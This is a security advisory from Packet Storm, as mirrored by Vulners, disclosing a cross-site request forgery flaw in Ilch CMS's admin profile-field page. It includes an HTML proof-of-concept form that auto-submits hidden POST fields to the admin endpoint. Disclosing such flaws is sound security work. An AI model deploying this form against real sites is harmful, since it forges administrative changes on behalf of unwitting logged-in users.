Lucene search
K

Ilch CMS Cross Site Request Forgery

🗓️ 18 Feb 2015 00:00:00Reported by ProvensecType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

Ilch CMS csrf vulnerability, lack of csrf toke

Code
`# Affected software: Ilch cms  
# Type of vulnerability: csrf  
# URL: http://www.ilch.de/  
# Discovered by: Provensec  
# Website: http://www.provensec.com  
# Description: Ilch cms profile field csrf  
# Proof of concept  
  
http://demo.opensourcecms.com/ilch/admin.php?profilefields (online demo)  
  
Above field was vulnerable to csrf vulnerability attacker was able to add  
value to the field due to lack of csrf token  
  
csrf poc:  
  
<html>  
<body>  
<form action="  
http://demo.opensourcecms.com/ilch/admin.php?profilefields" method="POST">  
<input type="hidden" name="sid" value="" />  
<input type="hidden" name="show" value="testvalue" />  
<input type="hidden" name="func" value="1" />  
<input type="hidden" name="sub" value="Eintragen" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
  
--   
  
Best Regards,  
*Ankit Bharathan.*  
  
*Save Energy... Save Nature... Go Green...*  
P *Consider the environment. Please don't print this e-mail unless  
absolutely necessary.*  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Feb 2015 00:00Current
0.6Low risk
Vulners AI Score0.6
28